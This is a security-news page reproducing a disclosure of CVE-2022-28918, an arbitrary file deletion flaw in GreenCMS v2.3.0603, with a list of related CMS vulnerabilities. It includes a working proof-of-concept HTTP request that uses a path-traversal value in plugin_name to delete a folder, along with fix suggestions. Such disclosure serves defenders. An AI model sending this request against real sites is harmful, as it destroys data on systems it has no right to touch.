Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28918: There is an arbitrary file deletion vulnerability here: /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name= · Issue #116 · GreenCMS/GreenCMS

GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=.

CVE
Open in Source
#vulnerability#windows#git#php

Vulnerability file: \Application\Common\Util\File.class.php
image

Vulnerability to reproduce:
1、First log in to the background
2、Visit url: http://www.xxx.com/index.php?m=admin&c=custom&a=plugin
3、Here delete the 111 folder in the root directory,construct the packet as follows:

GET /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=…/111 HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xxx.com/index.php?m=admin&c=custom&a=plugin
Cookie: PHPSESSID=jlmibkatfp939ds8pk3qpiv536; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1649066135; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1649066212; greencms_last_visit_page=aHR0cDovL3d3dy54aWFvZGkuY29tL2luZGV4LnBocD9tPWFkbWluJmM9Y3VzdG9tJmE9cGx1Z2lu
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Repair suggestion:
1、Filter …/ and …\
2、Specify the range of files to delete

Related news

CVE-2022-28523: There is an arbitrary file deletion vulnerability here: /admin/index.php/template/ajax?action=delete · Issue #17 · Neeke/HongCMS

HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete.

CVE-2022-28527: There is an arbitrary folder deletion vulnerability here:/admin.php?r=admin/AdminBackup/del · Issue #5 · ShaoGongBra/dhcms

dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del.

CVE-2022-28522: There is a stored xss vulnerability here: /index.php?m=home&c=message&a=add · Issue #5 · jorycn/thinkphp-zcms

ZCMS v20170206 was discovered to contain a stored cross-site scripting (XSS) vulnerability via index.php?m=home&c=message&a=add.

CVE-2022-28528: There is a file upload vulnerability here: /admin/index.php?mode=content&page=media&action=edit · Issue #14 · alexlang24/bloofoxCMS

bloofoxCMS v0.5.2.1 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?mode=content&page=media&action=edit.

CVE-2022-28521: bug_report/zcms:php file inclusion at main · zhendezuile/bug_report

ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config.

CVE-2022-27984: SQL injection vulnerability exists in CuppaCMS /administrator/templates/default/html/windows/right.php · Issue #30 · CuppaCMS/CuppaCMS

CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE